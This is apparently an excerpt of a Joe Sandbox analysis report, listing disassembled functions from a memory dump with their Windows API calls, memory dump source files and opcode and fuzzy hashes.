                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 59f85d3f3c94c2499414f39375c6bdf35bf84a28a5e3c4ed26f7f7f750ec13d3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f15f639e5a1fe3082ad0c83b1ef38c7c3d9d0de584016d9a3603bc669b1cd00
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59f85d3f3c94c2499414f39375c6bdf35bf84a28a5e3c4ed26f7f7f750ec13d3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15013172E40218BBEF619B94DC46FDFBBF8EB84751F200566FA01F6150D2709A41DB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001FD3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsspn.MSVCRT ref: 0001FF18
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00022229,00000000,-00000105,?,00000000,00000000), ref: 0002000F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1535828850-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aff74318f23ca0838a15b26db274750d31bb7bbd0d1417c2b829f7700f74e2db
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c8453074c45166e0b23b7e304a84c5a395f2b0a62d4741b563f38b884bf1e32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aff74318f23ca0838a15b26db274750d31bb7bbd0d1417c2b829f7700f74e2db
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96C17B75A04225CFEB64DF18D880BA9B7F6FF49314F1481AED40A9B251EB319E82CF41
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00015190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_setjmp3
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4215035025-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 848b20e7c0cf09d394997b0756fe024e621f80b826b9a4da3d780a39cd2868e6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5693a25e3e08e556d89dc33d9549fc20e4b19a2ada99a1573d85c488f27aaabe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 848b20e7c0cf09d394997b0756fe024e621f80b826b9a4da3d780a39cd2868e6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5951C4B1E01268DBDB60CB95DC94AEEBBB8FB85300F1000A9E509A7141DB348FC4CF65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000395F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00039631
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003964F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000396FD
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 0003971B
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00039733
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1670951261-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 735bccd7c3bf220bef727f1db38d757633eb716fac8bfc5ae73df609adc22c55
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23a80749bbc29cee9b689bb87214930280b1fd7ef4b8ea75a1cf311c83371a3f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735bccd7c3bf220bef727f1db38d757633eb716fac8bfc5ae73df609adc22c55
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED418371A2021957DB25CAA5DC85BEEB7BCEF14344F0001A9E505E3281DB74DE80CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000394E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039527
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003952F
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000395B5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000395BD
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00038C50: longjmp.MSVCRT(00050A70,00000001,0001206C,00015E68,?,?,?,?,00000000), ref: 00038CC4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D45
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D6D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000395CC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 288106245-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a460db9796f82b880bf4802f4403eb74bf3016c4be2f19fdb22be3e2ad62cc58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c96cc204d8e23078effaaa0c7e2d86c482232bcda52e804fef4a29361e273131
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a460db9796f82b880bf4802f4403eb74bf3016c4be2f19fdb22be3e2ad62cc58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF31A175B10604AFEF2A9F74D849BAF77ADEB85311F204129F502D61C1DBB4DD818B50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002260E Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 00022650
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0002F339
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 0002F347
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,?,00000104,00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 0002F383
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,000287F0,?,?,?,000287F0,00000000,?,00014A0A), ref: 0002F390
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 158340877-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d4fa53c6b1fd2a630ed7bf068a0049c2c9b4683ec2d8dc38fd8799340c7cca7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0930677501665e9e16e4f383a18330a3bd978a0db77ad7c67d5349b1b26c64b5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d4fa53c6b1fd2a630ed7bf068a0049c2c9b4683ec2d8dc38fd8799340c7cca7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF31C472A00326AFE7249FB4E849ABFB7F8EF44752B10093EE842C2141EB75D800CB50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00024CC2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00038FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00024CCA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00030BFC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00030C48
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00030C71
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2176976ee9cc8cf5f52091336dcdc7d73c9115b321a795dd73eb1b0901877c60
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d551d9440b80846d944030cbfa9b3f10e5b61616ec2f40a3fc256ee0fa641a40
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2176976ee9cc8cf5f52091336dcdc7d73c9115b321a795dd73eb1b0901877c60
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE312770711201AFEB69DF64E8556BF77A9FF42305F20442AE806C3291DB39DC40CB12
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E29B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001E2A3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1013686580-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d0f65607653fa8359c338de35ed541deb892a1d3adf572fdd351f78377ded721
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b330b43b736aa73cb7be8da738c280e05b24affa75edee1a8396bb0a322deb29
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f65607653fa8359c338de35ed541deb892a1d3adf572fdd351f78377ded721
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7110675304220EFE3252768FC5EF5A3BA5EF45722F300516F109965E1DF799C80CA55
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00038550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00038571
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0003857E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 000385C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 000385D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 000385DC
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ba1797f792b3c4601e2b8f4b82ea5d515ad50a55d779b4154075fbc841b59dca
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec6183aded8f08d79f2c1dfa3de233f579e6556a65c15b7de28ffd467ee40123
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba1797f792b3c4601e2b8f4b82ea5d515ad50a55d779b4154075fbc841b59dca
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8116735A102099ADB05EFF4DC05AEFB7B8AF0D711F10421AE511E7290EB349A40CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000270F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00027122
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00027131
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0002713A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00027143
                                                                                                                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00027158
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3914c715722211c65c880d6b212d02346b2a6c37088958550a8212448fd81d0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cfed962cf79f9565b40022241c8904c9d7a4b1d8c4688ccf11b362346fc597ef
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3914c715722211c65c880d6b212d02346b2a6c37088958550a8212448fd81d0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22114C71E05218EBDB14DBB8E94869EBBF9FF48311F510955D405E7250E7389B408B02
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00034840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
